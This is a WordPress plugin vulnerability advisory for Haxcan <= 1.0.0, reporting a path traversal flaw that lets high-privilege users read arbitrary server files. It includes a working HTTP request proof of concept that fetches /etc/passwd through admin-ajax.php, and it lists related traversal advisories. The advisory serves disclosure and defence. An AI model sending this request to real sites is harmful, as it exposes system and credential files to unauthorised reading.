Haxcan <= 1.0.0 – Arbitrary File Access | Plugin Vulnerabilities

Description

The plugin does not properly ensure that the file to be accessed is within the blog, allowing high privilege users to read any file on the web server.

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 93
Connection: close
Cookie: [admin]

action=get_ajax_response&haxfile=/etc/passwd&_action_request=get_haxfile

Affects Plugins

No known fix

Classification

Type

TRAVERSAL

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

faeca3ad-cc25-4742-bb3f-63e767cd31e4

Timeline

Publicly Published

2021-07-05 (about 4 years ago)

Added

2021-07-05 (about 4 years ago)

Last Updated

2021-07-05 (about 4 years ago)

Other

Published

Title

Published

2023-03-20

Title

All-In-One Security (AIOS) < 5.1.5 - Admin+ Arbitrary File/Folder Access via Traversal

Published

2021-07-18

Title

Photo Gallery < 1.5.75 - File Upload Path Traversal

Published

2023-05-16

Title

WP < 6.2.1 - Directory Traversal via Translation Files

Published

2019-05-23

Title

Simple File List Plugin < 3.2.8 - Unauthenticated Arbitrary File Download

Published

2021-11-11

Title

Download Plugin < 2.0.0 - Subscriber+ Website Download